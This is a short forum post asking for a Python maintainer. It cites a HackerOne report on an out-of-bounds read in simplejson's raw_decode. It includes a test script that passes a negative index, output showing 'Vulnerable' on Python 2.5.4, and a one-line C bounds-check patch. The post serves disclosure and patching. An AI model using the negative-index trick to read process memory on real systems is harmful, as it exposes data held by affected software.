Is there a python maintainer in CSSU team? https://hackerone.com/reports/12297 - security issue found in python (2.7 and newer for sure, I'm not sure if 2.5 is also vulnerable - I couldn't run the sample code to test the issue and I'm not sure which additional python package I should install to run it)
user:~# cat vulnerability_test.py from simplejson import JSONDecoder j = JSONDecoder() a = '128931233' b = "472389423" if id(a) < id(b): x = a y = b else: x = b y = a diff = id(x) - id(y) try: j.raw_decode(y, diff) print("Vulnerable") except: print("Not vulnerable") user:~# python Python 2.5.4 (r254:67916, May 17 2010, 21:00:32) [GCC 4.2.1] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> execfile("vulnerability_test.py") Vulnerable >>>
- if (idx >= length) { + if ( idx < 0 || idx >= length) {